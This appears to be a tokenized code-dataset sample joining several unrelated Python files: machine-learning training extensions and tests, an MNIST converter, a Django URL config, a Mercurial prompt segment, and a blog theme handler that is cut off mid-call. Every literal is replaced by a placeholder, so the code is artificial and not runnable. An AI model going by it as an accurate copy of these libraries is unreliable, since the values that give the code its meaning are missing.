<EOL> if key in trigger_keywords : <EOL> conditions [ key ] = value <EOL> else : <EOL> super_kwargs [ key ] = value <EOL> self . set_conditions ( ** conditions ) <EOL> super ( SimpleExtension , self ) . __init__ ( ** super_kwargs ) <EOL> def set_conditions ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . _conditions [ : ] = [ ] <EOL> predicates = { '<STR_LIT>' : has_done_epochs } <EOL> conditions = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> for key , value in kwargs . items ( ) : <EOL> if value : <EOL> if key in self . BOOLEAN_TRIGGERS : <EOL> self . add_condition ( [ conditions . get ( key , key ) ] , <EOL> predicate = predicates . get ( key , None ) ) <EOL> elif key in self . INTEGER_TRIGGERS : <EOL> predicate = Predicate ( key , value ) <EOL> self . add_condition ( [ conditions . get ( key , key ) ] , <EOL> predicate = predicate ) <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" . format ( key ) ) <EOL> return self <EOL> def add_condition ( self , callbacks_names , predicate = None , arguments = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( callbacks_names , ( list , tuple ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for _callback_name in callbacks_names : <EOL> if not arguments : <EOL> arguments = [ ] <EOL> if not predicate : <EOL> self . _conditions . append ( ( _callback_name , always_true , <EOL> arguments ) ) <EOL> else : <EOL> self . _conditions . append ( ( _callback_name , predicate , <EOL> arguments ) ) <EOL> return self <EOL> @ abstractmethod <EOL> def do ( self , which_callback , * args ) : <EOL> r"""<STR_LIT>""" <EOL> pass <EOL> def dispatch ( self , callback_invoked , * from_main_loop ) : <EOL> """<STR_LIT>""" <EOL> for callback_name , predicate , arguments in self . _conditions : <EOL> if ( callback_name == callback_invoked and <EOL> predicate ( self . main_loop . log ) ) : <EOL> self . do ( callback_invoked , * ( from_main_loop + tuple ( arguments ) ) ) <EOL> @ staticmethod <EOL> def parse_args ( which_callback , args ) : <EOL> """<STR_LIT>""" <EOL> args = tuple ( args ) <EOL> if ( which_callback == '<STR_LIT>' or <EOL> which_callback == '<STR_LIT>' ) : <EOL> return ( args [ <NUM_LIT:0> ] , ) , args [ <NUM_LIT:1> : ] <EOL> return ( ) , args <EOL> class FinishAfter ( SimpleExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( FinishAfter , self ) . __init__ ( ** kwargs ) <EOL> def do ( self , which_callback , * args ) : <EOL> self . main_loop . log . current_row [ '<STR_LIT>' ] = True <EOL> class Printing ( SimpleExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> kwargs . setdefault ( "<STR_LIT>" , True ) <EOL> super ( Printing , self ) . __init__ ( ** kwargs ) <EOL> def _print_attributes ( self , attribute_tuples ) : <EOL> for attr , value in sorted ( attribute_tuples . items ( ) , key = first ) : <EOL> if not attr . startswith ( "<STR_LIT:_>" ) : <EOL> print ( "<STR_LIT:\t>" , "<STR_LIT>" . format ( attr ) , value ) <EOL> def do ( self , which_callback , * args ) : <EOL> log = self . main_loop . log <EOL> print_status = True <EOL> print ( ) <EOL> print ( "<STR_LIT>" . join ( <NUM_LIT> * "<STR_LIT:->" ) ) <EOL> if which_callback == "<STR_LIT>" and log . status [ '<STR_LIT>' ] == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> elif which_callback == "<STR_LIT>" : <EOL> print ( "<STR_LIT>" ) <EOL> print_status = False <EOL> print ( "<STR_LIT>" . join ( <NUM_LIT> * "<STR_LIT:->" ) ) <EOL> if print_status : <EOL> print ( "<STR_LIT>" ) <EOL> self . _print_attributes ( log . status ) <EOL> print ( "<STR_LIT>" . format ( <EOL> log . status [ '<STR_LIT>' ] ) ) <EOL> self . _print_attributes ( log . current_row ) <EOL> print ( ) <EOL> class ProgressBar ( TrainingExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( ProgressBar , self ) . __init__ ( ** kwargs ) <EOL> self . bar = None <EOL> self . iter_count = <NUM_LIT:0> <EOL> def __getstate__ ( self ) : <EOL> state = dict ( self . __dict__ ) <EOL> del state [ '<STR_LIT:bar>' ] <EOL> return state <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ . update ( state ) <EOL> self . bar = None <EOL> def get_iter_per_epoch ( self ) : <EOL> """<STR_LIT>""" <EOL> iter_scheme = self . main_loop . data_stream . iteration_scheme <EOL> if hasattr ( iter_scheme , '<STR_LIT>' ) : <EOL> return iter_scheme . num_batches <EOL> elif ( hasattr ( iter_scheme , '<STR_LIT>' ) and <EOL> hasattr ( iter_scheme , '<STR_LIT>' ) ) : <EOL> return iter_scheme . num_examples // iter_scheme . batch_size <EOL> return None <EOL> def create_bar ( self ) : <EOL> """<STR_LIT>""" <EOL> iter_per_epoch = self . get_iter_per_epoch ( ) <EOL> epochs_done = self . main_loop . log . status [ '<STR_LIT>' ] <EOL> if iter_per_epoch is None : <EOL> widgets = [ "<STR_LIT>" . format ( epochs_done ) , <EOL> progressbar . Counter ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . BouncingBar ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . Timer ( ) ] <EOL> iter_per_epoch = progressbar . UnknownLength <EOL> else : <EOL> widgets = [ "<STR_LIT>" . format ( epochs_done ) , <EOL> progressbar . Counter ( ) , <EOL> '<STR_LIT>' , progressbar . Percentage ( ) , '<STR_LIT>' , <EOL> progressbar . Bar ( ) , '<STR_LIT:U+0020>' , <EOL> progressbar . Timer ( ) , '<STR_LIT:U+0020>' , progressbar . ETA ( ) ] <EOL> return progressbar . ProgressBar ( widgets = widgets , <EOL> max_value = iter_per_epoch ) <EOL> def before_epoch ( self ) : <EOL> self . iter_count = <NUM_LIT:0> <EOL> def after_epoch ( self ) : <EOL> if self . bar is None : <EOL> return <EOL> self . bar . finish ( ) <EOL> self . bar = None <EOL> def before_batch ( self , batch ) : <EOL> if self . bar is None : <EOL> self . bar = self . create_bar ( ) <EOL> self . bar . start ( ) <EOL> self . iter_count += <NUM_LIT:1> <EOL> self . bar . update ( self . iter_count ) <EOL> class Timing ( SimpleExtension ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> super ( Timing , self ) . __init__ ( ** kwargs ) <EOL> self . current = { <EOL> level : { '<STR_LIT:train>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> for level in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> self . previous = { <EOL> level : { '<STR_LIT:train>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> for level in [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> def do ( self , which_callback , * args ) : <EOL> current_row = self . main_loop . log . current_row <EOL> profile = self . main_loop . profile . total <EOL> if which_callback == '<STR_LIT>' : <EOL> current_row [ '<STR_LIT>' ] = profile [ ( '<STR_LIT>' , ) ] <EOL> return <EOL> if which_callback == '<STR_LIT>' : <EOL> level = '<STR_LIT>' <EOL> elif which_callback == '<STR_LIT>' : <EOL> level = '<STR_LIT>' <EOL> for action in [ '<STR_LIT:train>' , '<STR_LIT>' ] : <EOL> self . previous [ level ] [ action ] = self . current [ level ] [ action ] <EOL> self . current [ level ] [ action ] = profile [ '<STR_LIT>' , '<STR_LIT>' , action ] <EOL> current_row [ '<STR_LIT>' . format ( action , level ) ] = self . current [ level ] [ action ] - self . previous [ level ] [ action ] <EOL> current_row [ '<STR_LIT>' . format ( action ) ] = self . current [ level ] [ action ] </s>
<s> from __future__ import absolute_import , print_function <EOL> import doctest <EOL> import fnmatch <EOL> import importlib <EOL> import os <EOL> import pkgutil <EOL> import blocks <EOL> import blocks . bricks <EOL> from blocks . utils . testing import skip_if_not_available <EOL> def setup ( testobj ) : <EOL> skip_if_not_available ( modules = [ '<STR_LIT>' ] ) <EOL> testobj . globs [ '<STR_LIT>' ] = absolute_import <EOL> testobj . globs [ '<STR_LIT>' ] = print_function <EOL> def load_tests ( loader , tests , ignore ) : <EOL> for _ , module , _ in pkgutil . walk_packages ( path = blocks . __path__ , <EOL> prefix = blocks . __name__ + '<STR_LIT:.>' ) : <EOL> try : <EOL> tests . addTests ( doctest . DocTestSuite ( <EOL> module = importlib . import_module ( module ) , setUp = setup , <EOL> optionflags = doctest . IGNORE_EXCEPTION_DETAIL ) ) <EOL> except : <EOL> pass <EOL> docs = [ ] <EOL> for root , _ , filenames in os . walk ( os . path . join ( blocks . __path__ [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' ) ) : <EOL> for doc in fnmatch . filter ( filenames , '<STR_LIT>' ) : <EOL> docs . append ( os . path . abspath ( os . path . join ( root , doc ) ) ) <EOL> tests . addTests ( doctest . DocFileSuite ( <EOL> * docs , module_relative = False , setUp = setup , <EOL> optionflags = doctest . IGNORE_EXCEPTION_DETAIL ) ) <EOL> return tests </s>
<s> import os <EOL> import signal <EOL> import time <EOL> from itertools import count <EOL> from multiprocessing import Process <EOL> from fuel . datasets import IterableDataset <EOL> from mock import MagicMock <EOL> from numpy . testing import assert_raises <EOL> from six . moves import cPickle <EOL> from blocks . main_loop import MainLoop <EOL> from blocks . extensions import TrainingExtension , FinishAfter , Printing <EOL> from blocks . utils import unpack <EOL> from blocks . config import config <EOL> from blocks . utils . testing import MockAlgorithm , MockMainLoop <EOL> class WriteBatchExtension ( TrainingExtension ) : <EOL> """<STR_LIT>""" <EOL> def after_batch ( self , _ ) : <EOL> self . main_loop . log . current_row [ '<STR_LIT>' ] = self . main_loop . algorithm . batch <EOL> def test_main_loop ( ) : <EOL> old_config_profile_value = config . profile <EOL> config . profile = True <EOL> main_loop = MainLoop ( <EOL> MockAlgorithm ( ) , IterableDataset ( range ( <NUM_LIT:10> ) ) . get_example_stream ( ) , <EOL> extensions = [ WriteBatchExtension ( ) , FinishAfter ( after_n_epochs = <NUM_LIT:2> ) ] ) <EOL> main_loop . run ( ) <EOL> assert_raises ( AttributeError , getattr , main_loop , '<STR_LIT>' ) <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT:20> <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == [ <NUM_LIT:10> , <NUM_LIT:20> ] <EOL> assert len ( main_loop . log ) == <NUM_LIT:20> <EOL> for i in range ( <NUM_LIT:20> ) : <EOL> assert main_loop . log [ i + <NUM_LIT:1> ] [ '<STR_LIT>' ] == { '<STR_LIT:data>' : i % <NUM_LIT:10> } <EOL> config . profile = old_config_profile_value <EOL> def test_training_resumption ( ) : <EOL> def do_test ( with_serialization ) : <EOL> data_stream = IterableDataset ( range ( <NUM_LIT:10> ) ) . get_example_stream ( ) <EOL> main_loop = MainLoop ( <EOL> MockAlgorithm ( ) , data_stream , <EOL> extensions = [ WriteBatchExtension ( ) , <EOL> FinishAfter ( after_n_batches = <NUM_LIT> ) ] ) <EOL> main_loop . run ( ) <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT> <EOL> if with_serialization : <EOL> main_loop = cPickle . loads ( cPickle . dumps ( main_loop ) ) <EOL> finish_after = unpack ( <EOL> [ ext for ext in main_loop . extensions <EOL> if isinstance ( ext , FinishAfter ) ] , singleton = True ) <EOL> finish_after . add_condition ( <EOL> [ "<STR_LIT>" ] , <EOL> predicate = lambda log : log . status [ '<STR_LIT>' ] == <NUM_LIT> ) <EOL> main_loop . run ( ) <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT> <EOL> assert main_loop . log . status [ '<STR_LIT>' ] == <NUM_LIT:2> <EOL> for i in range ( <NUM_LIT> ) : <EOL> assert main_loop . log [ i + <NUM_LIT:1> ] [ '<STR_LIT>' ] == { "<STR_LIT:data>" : i % <NUM_LIT:10> } <EOL> do_test ( False ) <EOL> do_test ( True ) <EOL> def test_training_interrupt ( ) : <EOL> def process_batch ( batch ) : <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> algorithm = MockAlgorithm ( ) <EOL> algorithm . process_batch = process_batch <EOL> main_loop = MockMainLoop ( <EOL> algorithm = algorithm , <EOL> data_stream = IterableDataset ( count ( ) ) . get_example_stream ( ) , <EOL> extensions = [ Printing ( ) ] <EOL> ) <EOL> p = Process ( target = main_loop . run ) <EOL> p . start ( ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> os . kill ( p . pid , signal . SIGINT ) <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> assert p . is_alive ( ) <EOL> os . kill ( p . pid , signal . SIGINT ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> assert not p . is_alive ( ) <EOL> p . join ( ) <EOL> def test_error ( ) : <EOL> ext = TrainingExtension ( ) <EOL> ext . after_batch = MagicMock ( side_effect = KeyError ) <EOL> ext . on_error = MagicMock ( ) <EOL> main_loop = MockMainLoop ( extensions = [ ext , FinishAfter ( after_epoch = True ) ] ) <EOL> assert_raises ( KeyError , main_loop . run ) <EOL> ext . on_error . assert_called_once_with ( ) <EOL> assert '<STR_LIT>' in main_loop . log . current_row <EOL> ext . on_error = MagicMock ( side_effect = AttributeError ) <EOL> main_loop = MockMainLoop ( extensions = [ ext , FinishAfter ( after_epoch = True ) ] ) <EOL> assert_raises ( KeyError , main_loop . run ) <EOL> ext . on_error . assert_called_once_with ( ) <EOL> assert '<STR_LIT>' in main_loop . log . current_row </s>
<s> import gzip <EOL> import os <EOL> import struct <EOL> import h5py <EOL> import numpy <EOL> from fuel . converters . base import fill_hdf5_file , check_exists <EOL> MNIST_IMAGE_MAGIC = <NUM_LIT> <EOL> MNIST_LABEL_MAGIC = <NUM_LIT> <EOL> TRAIN_IMAGES = '<STR_LIT>' <EOL> TRAIN_LABELS = '<STR_LIT>' <EOL> TEST_IMAGES = '<STR_LIT>' <EOL> TEST_LABELS = '<STR_LIT>' <EOL> ALL_FILES = [ TRAIN_IMAGES , TRAIN_LABELS , TEST_IMAGES , TEST_LABELS ] <EOL> @ check_exists ( required_files = ALL_FILES ) <EOL> def convert_mnist ( directory , output_directory , output_filename = None , <EOL> dtype = None ) : <EOL> """<STR_LIT>""" <EOL> if not output_filename : <EOL> if dtype : <EOL> output_filename = '<STR_LIT>' . format ( dtype ) <EOL> else : <EOL> output_filename = '<STR_LIT>' <EOL> output_path = os . path . join ( output_directory , output_filename ) <EOL> h5file = h5py . File ( output_path , mode = '<STR_LIT:w>' ) <EOL> train_feat_path = os . path . join ( directory , TRAIN_IMAGES ) <EOL> train_features = read_mnist_images ( train_feat_path , dtype ) <EOL> train_lab_path = os . path . join ( directory , TRAIN_LABELS ) <EOL> train_labels = read_mnist_labels ( train_lab_path ) <EOL> test_feat_path = os . path . join ( directory , TEST_IMAGES ) <EOL> test_features = read_mnist_images ( test_feat_path , dtype ) <EOL> test_lab_path = os . path . join ( directory , TEST_LABELS ) <EOL> test_labels = read_mnist_labels ( test_lab_path ) <EOL> data = ( ( '<STR_LIT:train>' , '<STR_LIT>' , train_features ) , <EOL> ( '<STR_LIT:train>' , '<STR_LIT>' , train_labels ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , test_features ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , test_labels ) ) <EOL> fill_hdf5_file ( h5file , data ) <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:0> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:1> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:2> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:3> ] . label = '<STR_LIT:width>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:0> ] . label = '<STR_LIT>' <EOL> h5file [ '<STR_LIT>' ] . dims [ <NUM_LIT:1> ] . label = '<STR_LIT:index>' <EOL> h5file . flush ( ) <EOL> h5file . close ( ) <EOL> return ( output_path , ) <EOL> def fill_subparser ( subparser ) : <EOL> """<STR_LIT>""" <EOL> subparser . add_argument ( <EOL> "<STR_LIT>" , help = "<STR_LIT>" + <EOL> "<STR_LIT>" , <EOL> choices = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:bool>' ) , type = str , default = None ) <EOL> return convert_mnist <EOL> def read_mnist_images ( filename , dtype = None ) : <EOL> """<STR_LIT>""" <EOL> with gzip . open ( filename , '<STR_LIT:rb>' ) as f : <EOL> magic , number , rows , cols = struct . unpack ( '<STR_LIT>' , f . read ( <NUM_LIT:16> ) ) <EOL> if magic != MNIST_IMAGE_MAGIC : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> array = numpy . frombuffer ( f . read ( ) , dtype = '<STR_LIT>' ) <EOL> array = array . reshape ( ( number , <NUM_LIT:1> , rows , cols ) ) <EOL> if dtype : <EOL> dtype = numpy . dtype ( dtype ) <EOL> if dtype . kind == '<STR_LIT:b>' : <EOL> array = array >= <NUM_LIT> <EOL> elif dtype . kind == '<STR_LIT:f>' : <EOL> array = array . astype ( dtype ) <EOL> array /= <NUM_LIT> <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return array <EOL> def read_mnist_labels ( filename ) : <EOL> """<STR_LIT>""" <EOL> with gzip . open ( filename , '<STR_LIT:rb>' ) as f : <EOL> magic , _ = struct . unpack ( '<STR_LIT>' , f . read ( <NUM_LIT:8> ) ) <EOL> if magic != MNIST_LABEL_MAGIC : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> array = numpy . frombuffer ( f . read ( ) , dtype = '<STR_LIT>' ) <EOL> array = array . reshape ( array . size , <NUM_LIT:1> ) <EOL> return array </s>
<s> from fuel . downloaders . base import default_downloader <EOL> def fill_subparser ( subparser ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> filename = '<STR_LIT>' <EOL> subparser . set_defaults ( urls = [ url ] , filenames = [ filename ] ) <EOL> return default_downloader </s>
<s> import numpy <EOL> from numpy . testing import assert_raises <EOL> from fuel import config <EOL> from fuel . datasets import CIFAR100 <EOL> from fuel . streams import DataStream <EOL> from fuel . schemes import SequentialScheme <EOL> def test_cifar100 ( ) : <EOL> train = CIFAR100 ( ( '<STR_LIT:train>' , ) , load_in_memory = False ) <EOL> assert train . num_examples == <NUM_LIT> <EOL> handle = train . open ( ) <EOL> coarse_labels , features , fine_labels = train . get_data ( handle , <EOL> slice ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> assert features . shape == ( <NUM_LIT:10> , <NUM_LIT:3> , <NUM_LIT:32> , <NUM_LIT:32> ) <EOL> assert coarse_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> assert fine_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> train . close ( handle ) <EOL> test = CIFAR100 ( ( '<STR_LIT:test>' , ) , load_in_memory = False ) <EOL> handle = test . open ( ) <EOL> coarse_labels , features , fine_labels = test . get_data ( handle , <EOL> slice ( <NUM_LIT:0> , <NUM_LIT:10> ) ) <EOL> assert features . shape == ( <NUM_LIT:10> , <NUM_LIT:3> , <NUM_LIT:32> , <NUM_LIT:32> ) <EOL> assert coarse_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> assert fine_labels . shape == ( <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> assert features . dtype == numpy . uint8 <EOL> assert coarse_labels . dtype == numpy . uint8 <EOL> assert fine_labels . dtype == numpy . uint8 <EOL> test . close ( handle ) <EOL> stream = DataStream . default_stream ( <EOL> test , iteration_scheme = SequentialScheme ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> data = next ( stream . get_epoch_iterator ( ) ) [ <NUM_LIT:1> ] <EOL> assert data . min ( ) >= <NUM_LIT:0.0> and data . max ( ) <= <NUM_LIT:1.0> <EOL> assert data . dtype == config . floatX <EOL> assert_raises ( ValueError , CIFAR100 , ( '<STR_LIT>' , ) ) </s>
<s> from django . conf . urls import patterns , url <EOL> from django . views . generic import TemplateView <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( '<STR_LIT>' , TemplateView . as_view ( template_name = '<STR_LIT>' ) , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import os <EOL> import subprocess <EOL> def get_hg_status ( ) : <EOL> has_modified_files = False <EOL> has_untracked_files = False <EOL> has_missing_files = False <EOL> p = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT:status>' ] , stdout = subprocess . PIPE ) <EOL> output = p . communicate ( ) [ <NUM_LIT:0> ] . decode ( "<STR_LIT:utf-8>" ) <EOL> for line in output . split ( '<STR_LIT:\n>' ) : <EOL> if line == '<STR_LIT>' : <EOL> continue <EOL> elif line [ <NUM_LIT:0> ] == '<STR_LIT:?>' : <EOL> has_untracked_files = True <EOL> elif line [ <NUM_LIT:0> ] == '<STR_LIT:!>' : <EOL> has_missing_files = True <EOL> else : <EOL> has_modified_files = True <EOL> return has_modified_files , has_untracked_files , has_missing_files <EOL> def add_hg_segment ( powerline ) : <EOL> branch = os . popen ( '<STR_LIT>' ) . read ( ) . rstrip ( ) <EOL> if len ( branch ) == <NUM_LIT:0> : <EOL> return False <EOL> bg = Color . REPO_CLEAN_BG <EOL> fg = Color . REPO_CLEAN_FG <EOL> has_modified_files , has_untracked_files , has_missing_files = get_hg_status ( ) <EOL> if has_modified_files or has_untracked_files or has_missing_files : <EOL> bg = Color . REPO_DIRTY_BG <EOL> fg = Color . REPO_DIRTY_FG <EOL> extra = '<STR_LIT>' <EOL> if has_untracked_files : <EOL> extra += '<STR_LIT:+>' <EOL> if has_missing_files : <EOL> extra += '<STR_LIT:!>' <EOL> branch += ( '<STR_LIT:U+0020>' + extra if extra != '<STR_LIT>' else '<STR_LIT>' ) <EOL> return powerline . append ( '<STR_LIT>' % branch , fg , bg ) </s>
<s> import os <EOL> import os . path <EOL> import re <EOL> import shutil <EOL> from base import BaseHandler <EOL> from logic import url_factory <EOL> class CustomizeHandler ( BaseHandler ) : <EOL> def get ( self ) : <EOL> if not self . authenticate ( author = True ) : <EOL> return <EOL> self . display [ "<STR_LIT:user>" ] = self . get_author_user ( ) <EOL> static_path = self . application . settings [ "<STR_LIT>" ] <EOL> global_themes_directory = os . path . join ( static_path , '<STR_LIT>' ) <EOL> local_themes_directory = url_factory . resource_directory ( self , '<STR_LIT>' ) <EOL> local_themes_stem = local_themes_directory [ len ( static_path ) + <NUM_LIT:1> : ] <EOL> self . display [ '<STR_LIT>' ] = [ ] <EOL> if os . path . exists ( local_themes_directory ) : <EOL> local_themes = os . listdir ( local_themes_directory ) <EOL> for theme in local_themes : <EOL> theme_path = os . path . join ( local_themes_directory , theme ) <EOL> css_path = os . path . join ( theme_path , theme + '<STR_LIT>' ) <EOL> if ( not theme . startswith ( '<STR_LIT:.>' ) and os . path . isdir ( theme_path ) and <EOL> os . path . exists ( css_path ) ) : <EOL> self . display [ '<STR_LIT>' ] . append ( { '<STR_LIT:path>' : os . path . join ( <EOL> local_themes_stem , os . path . join ( theme , theme + '<STR_LIT>' ) ) } ) <EOL> local_themes = os . listdir ( global_themes_directory ) <EOL> for theme in local_themes : <EOL> theme_path = os . path . join ( global_themes_directory , theme ) <EOL> css_path = os . path . join ( theme_path , theme + '<STR_LIT>' ) <EOL> if ( not theme . startswith ( '<STR_LIT:.>' ) and os . path . isdir ( theme_path ) and <EOL> os . path . exists ( css_path ) ) : <EOL> self . display [ '<STR_LIT>' ] . append ( { '<STR_LIT:path>' : os . path . join ( '<STR_LIT>' , <EOL> os . path . join ( theme , theme + '<STR_LIT>' ) ) } ) <EOL> if self . display [ "<STR_LIT:user>" ] . theme . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> current_theme_path = os . path . join ( local_themes_stem , '<STR_LIT>' ) <EOL> default_stylesheet_path = os . path . join ( current_theme_path , <EOL> '<STR_LIT>' ) <EOL> self . display [ '<STR_LIT>' ] . append ( { '<STR_LIT:path>' : default_stylesheet_path } ) <EOL> for theme in self . display [ '<STR_LIT>' ] : <EOL> f = open ( os . path . join ( static_path , theme [ '<STR_LIT:path>' ] ) ) <EOL> theme_data = f . read ( ) <EOL> title = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT:title>' ] = ( title . group ( <NUM_LIT:1> ) if <EOL> title and len ( title . groups ( ) ) > <NUM_LIT:1> else '<STR_LIT>' ) <EOL> link = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT>' ] = link . group ( <NUM_LIT:1> ) if link and len ( link . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' <EOL> author = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT>' ] = ( author . group ( <NUM_LIT:1> ) if <EOL> author and len ( author . groups ( ) ) > <NUM_LIT:1> else '<STR_LIT>' ) <EOL> author_link = re . search ( r'<STR_LIT>' , theme_data ) <EOL> theme [ '<STR_LIT>' ] = ( author_link . group ( <NUM_LIT:1> ) if <EOL> author_link and len ( author_link . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' ) <EOL> theme [ '<STR_LIT>' ] = os . path . join ( os . path . dirname ( theme [ '<STR_LIT:path>' ] ) , <EOL> '<STR_LIT>' ) <EOL> theme [ '<STR_LIT>' ] = self . application . settings [ "<STR_LIT>" ] <EOL> options = re . findall ( <EOL> r'<STR_LIT>' , theme_data , re . M ) <EOL> for index , option in enumerate ( options ) : <EOL> theme [ '<STR_LIT>' + str ( index ) ] = option <EOL> extra_head_html = re . search ( r'<STR_LIT>' , <EOL> theme_data , re . M | re . DOTALL ) <EOL> theme [ '<STR_LIT>' ] = ( extra_head_html . group ( <NUM_LIT:1> ) . replace ( <EOL> '<STR_LIT:\n>' , '<STR_LIT>' ) if extra_head_html and <EOL> len ( extra_head_html . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' ) <EOL> extra_body_end_html = re . search ( <EOL> r'<STR_LIT>' , theme_data , re . M | re . DOTALL ) <EOL> theme [ '<STR_LIT>' ] = extra_body_end_html . group ( <NUM_LIT:1> ) . replace ( <EOL> '<STR_LIT:\n>' , '<STR_LIT>' ) if extra_body_end_html and len ( <EOL> extra_body_end_html . groups ( ) ) > <NUM_LIT:0> else '<STR_LIT>' <EOL> if ( ( self . display [ "<STR_LIT:user>" ] . theme . find ( '<STR_LIT>' ) != - <NUM_LIT:1> and <EOL> theme [ '<STR_LIT:path>' ] . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) <EOL> or self . display [ "<STR_LIT:user>" ] . theme . replace ( '<STR_LIT>' , '<STR_LIT>' ) == <EOL> theme [ '<STR_LIT:path>' ] ) : <EOL> self . display [ '<STR_LIT>' ] = theme <EOL> if re . search ( '<STR_LIT>' , self . display [ "<STR_LIT:user>" ] . theme ) : <EOL> self . display [ '<STR_LIT>' ] = self . display [ "<STR_LIT:user>" ] . theme <EOL> else : <EOL> self . display [ '<STR_LIT>' ] = None <EOL> self . display [ '<STR_LIT>' ] = self . display [ "<STR_LIT:user>" ] . theme . find ( <EOL> '<STR_LIT>' ) != - <NUM_LIT:1> <EOL> f . close ( ) <EOL> self . display [ '<STR_LIT>' ] = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , ] <EOL> self . fill_template ( "<STR_LIT>" ) <EOL> def post ( self ) : <EOL> if not self . authenticate ( author = True ) : <EOL> return <EOL> user = self . get_author_user ( ) <EOL> user . title = self . get_argument ( '<STR_LIT:title>' , '<STR_LIT>' ) <EOL> user . description = self . get_argument ( '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> user . email = self . get_argument ( '<STR_LIT:email>' ) <EOL> user . name = self . get_argument ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> user . favicon = url_factory . clean_filename ( self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> user . currency = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . theme_title = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . theme_link = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . theme_author = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . theme_author_link = self . get_argument ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> user . extra_head_html = self . get_argument ( <EOL> '<STR_LIT>' , 